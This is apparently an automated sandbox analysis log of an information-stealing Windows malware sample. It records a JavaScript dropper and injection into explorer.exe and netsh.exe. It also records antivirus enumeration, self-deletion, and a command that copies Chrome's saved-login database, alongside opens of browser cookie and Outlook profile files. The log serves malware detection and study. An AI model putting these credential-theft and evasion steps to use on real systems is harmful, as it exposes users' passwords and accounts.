Source: C:\Windows\System32\wscript.exe File created: bin.exe.0.dr
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: F70000
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread register set: target process: 3968
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 3968
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\ORYNeBzyRj.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: explorer.exe, 00000004.00000000.301363457.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.338231014.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.433216017.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000004.00000000.355441466.0000000008154000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.318036625.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.339410279.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.339410279.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.366730597.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.433580212.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.339410279.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.366730597.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.433580212.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.433245938.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.366242823.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.338889265.0000000000708000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000004.00000000.339410279.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.366730597.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.433580212.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: wscript.exe, 0000000D.00000003.631428377.0000013D91838000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Windows Defender\MsMpeng.exe
Source: wscript.exe, 0000000A.00000002.831511243.00000216E07E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.760010015.00000216E07F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759860590.00000216E07E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r\MsMpeng.exe
Source: wscript.exe, 00000001.00000002.837229937.000001922CD43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.805518643.000001922ACD8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.548963430.000001922CD45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: wscript.exe, 0000000F.00000002.811940663.000001D1932F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.789431407.000001D193304000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.786139683.000001D1932EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Defender\MsMpeng.exe

Stealing of Sensitive Information

Source: Yara match File source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: 0000000D.00000002.812752920.0000013D91256000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.830575316.000001922C81F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.812070527.000001D194C8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.807977026.00000216DE0B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.812584046.0000013D8F46A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.808147035.00000216DFE16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.830179135.000001922AD6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.807957265.00000216DE0A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.811908702.000001D1932BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.812596470.0000013D8F474000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1892, type: MEMORYSTR
Source: C:\Windows\SysWOW64\netsh.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality
